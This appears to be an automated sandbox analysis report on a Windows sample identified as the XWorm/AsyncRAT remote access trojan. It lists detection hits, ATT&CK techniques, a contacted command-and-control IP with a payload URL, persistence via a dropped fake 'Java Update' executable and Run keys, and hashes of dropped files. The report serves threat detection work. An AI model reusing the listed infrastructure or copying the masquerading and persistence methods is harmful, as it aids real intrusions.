Source: Yara match	File source: 00000000.00000002.2943113480.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Java Update(32bit).exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: XClient.exe, type: SAMPLE
Source: Yara match	File source: 0.0.XClient.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2943113480.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1674357951.0000000000E22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Java Update(32bit).exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 Input Capture	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Scheduled Task/Job	2 Scheduled Task/Job	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	121 Registry Run Keys / Startup Folder	2 Scheduled Task/Job	11 Obfuscated Files or Information	Security Account Manager	541 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	121 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
XClient.exe	84%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
XClient.exe	100%	Avira	TR/Spy.Gen
XClient.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Java Update(32bit).exe	100%	Avira	TR/Spy.Gen
C:\ProgramData\Java Update(32bit).exe	100%	Joe Sandbox ML
C:\ProgramData\Java Update(32bit).exe	84%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT

Source	Detection	Scanner	Label
http://www.microsoft.coiopsP	0%	Avira URL Cloud	safe
http://www.microsoft.BranchCache.psd1	0%	Avira URL Cloud	safe
45.141.26.234	0%	Avira URL Cloud	safe
http://www.microsoft.B	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
45.141.26.234	true	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1768079686.0000018A90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1866425813.000001EB97D43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2005404094.000002BF10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2183439729.0000028990071000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.2060656038.0000028980228000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.1753886621.0000018A80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808335467.000001EB87EFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919449847.000002BF00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2060656038.0000028980228000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.2060656038.0000028980228000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.coiopsP	powershell.exe, 0000000B.00000002.2214801332.00000289FAE54000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.1753886621.0000018A80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808335467.000001EB87EFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919449847.000002BF00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2060656038.0000028980228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000B.00000002.2183439729.0000028990071000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1768079686.0000018A90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1866425813.000001EB97D43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2005404094.000002BF10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2183439729.0000028990071000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 0000000B.00000002.2214801332.00000289FAE54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000B.00000002.2183439729.0000028990071000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.mic	powershell.exe, 00000004.00000002.1886872307.000001EBA03E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2030326233.000002BF6DED5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000B.00000002.2183439729.0000028990071000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micft.cMicRosof	powershell.exe, 00000004.00000002.1886872307.000001EBA03E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2030326233.000002BF6DED5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.microsoft.B	powershell.exe, 00000001.00000002.1781139715.0000018AF6D00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000001.00000002.1753886621.0000018A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808335467.000001EB87CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919449847.000002BF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2060656038.0000028980001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.BranchCache.psd1	powershell.exe, 00000001.00000002.1781139715.0000018AF6D00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	XClient.exe, 00000000.00000002.2943113480.0000000003311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1753886621.0000018A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808335467.000001EB87CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1919449847.000002BF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2060656038.0000028980001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.2060656038.0000028980228000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
45.141.26.234	unknown	Netherlands		62068	SPECTRAIPSpectraIPBVNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583254
Start date and time:	2025-01-02 09:44:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	XClient.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/21@1/2
EGA Information:	Successful, ratio: 10%
HCA Information:	Successful, ratio: 100% Number of executed functions: 98 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Java Update(32bit).exe, PID 4504 because it is empty
Execution Graph export aborted for target Java Update(32bit).exe, PID 5724 because it is empty
Execution Graph export aborted for target Java Update(32bit).exe, PID 7520 because it is empty
Execution Graph export aborted for target Java Update(32bit).exe, PID 7864 because it is empty
Execution Graph export aborted for target Java Update(32bit).exe, PID 7956 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5676 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7456 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7700 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8000 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:45:03	API Interceptor	51x Sleep call for process: powershell.exe modified
03:45:58	API Interceptor	449541x Sleep call for process: XClient.exe modified
08:45:54	Task Scheduler	Run new task: Java Update(32bit) path: C:\ProgramData\Java s>Update(32bit).exe
08:45:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Java Update(32bit) C:\ProgramData\Java Update(32bit).exe
08:46:06	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Java Update(32bit) C:\ProgramData\Java Update(32bit).exe
08:46:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update(32bit).lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	mcgen.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	intro.avi.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	AimStar.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	L988Ph5sKX.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	kj93GnZHBS.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	ANuh30XoVu.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	rivalsanticheat.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	ip-api.com/json
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	ip-api.com/xml
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
45.141.26.234	da6ke5KbfB.exe	Get hash	malicious	AsyncRAT, Babadeda, XWorm	Browse	45.141.26.234/x.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	mcgen.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	intro.avi.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	AimStar.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	L988Ph5sKX.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	kj93GnZHBS.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	ANuh30XoVu.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rivalsanticheat.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	208.95.112.1
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	208.95.112.1
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPECTRAIPSpectraIPBVNL	nklmips.elf	Get hash	malicious	Unknown	Browse	89.190.159.77
	1.elf	Get hash	malicious	Unknown	Browse	45.141.239.79
	TRC.ppc.elf	Get hash	malicious	Mirai	Browse	45.144.191.245
	da6ke5KbfB.exe	Get hash	malicious	AsyncRAT, Babadeda, XWorm	Browse	45.141.26.234
	03VPFXH490.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.234
	saiya.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.134
	windxcmd.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.134
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	45.138.53.54
	18fvs4AVae.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	45.141.26.170
	Fulloption_V2.1.exe	Get hash	malicious	XWorm	Browse	45.141.27.248
TUT-ASUS	mcgen.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	intro.avi.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	AimStar.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	L988Ph5sKX.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	kj93GnZHBS.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	ANuh30XoVu.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rivalsanticheat.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	208.95.112.1
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	208.95.112.1
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1

Process:	C:\Users\user\Desktop\XClient.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	42496
Entropy (8bit):	5.56894359316851
Encrypted:	false
SSDEEP:	768:XrfDweqDOAngTZOEKreuCCKUS0BMRCJF5Pa9pmxC96vOwhl3/uzd:DDwe42TZOEKaNnFrSF49AxG6vOwXmp
MD5:	3E0189C1648E7DD2D285558CB6FD7058
SHA1:	09E1BE1BA1DA3D2F7F68E5C768464368E36DF757
SHA-256:	52AC1A50DFF9EE094363833B629EA01DAD640382D0BA424B5B5AD85D5D173715
SHA-512:	DC157FBBD4738924D1F774C6E748F93FB763A7A23757A752052F3A12F398ED39F9F0FD3D89DE43510D8E600E2FF8B0379A7163E10DE2562EA328D23D278B67B1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\ProgramData\Java Update(32bit).exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Java Update(32bit).exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\Java Update(32bit).exe, Author: Joe Security Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\ProgramData\Java Update(32bit).exe, Author: Sekoia.io Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Java Update(32bit).exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[\|ug............................N.... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................0.......H.......X_...[............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Java Update(32bit).exe.log

Download File

Process:	C:\ProgramData\Java Update(32bit).exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\Desktop\XClient.exe
File Type:	Generic INItialization configuration [WIN]
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.6722687970803873
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
MD5:	DE63D53293EBACE29F3F54832D739D40
SHA1:	1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
SHA-256:	A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
SHA-512:	10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wo1qzs1.nyh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25iy1vmz.1xc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_an21qkmn.cyl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2rhyebk.wxx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyftxlb3.zmu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eswv1fjy.vpg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exwlwi22.ufn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzouj02x.uir.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlwajbml.xhx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
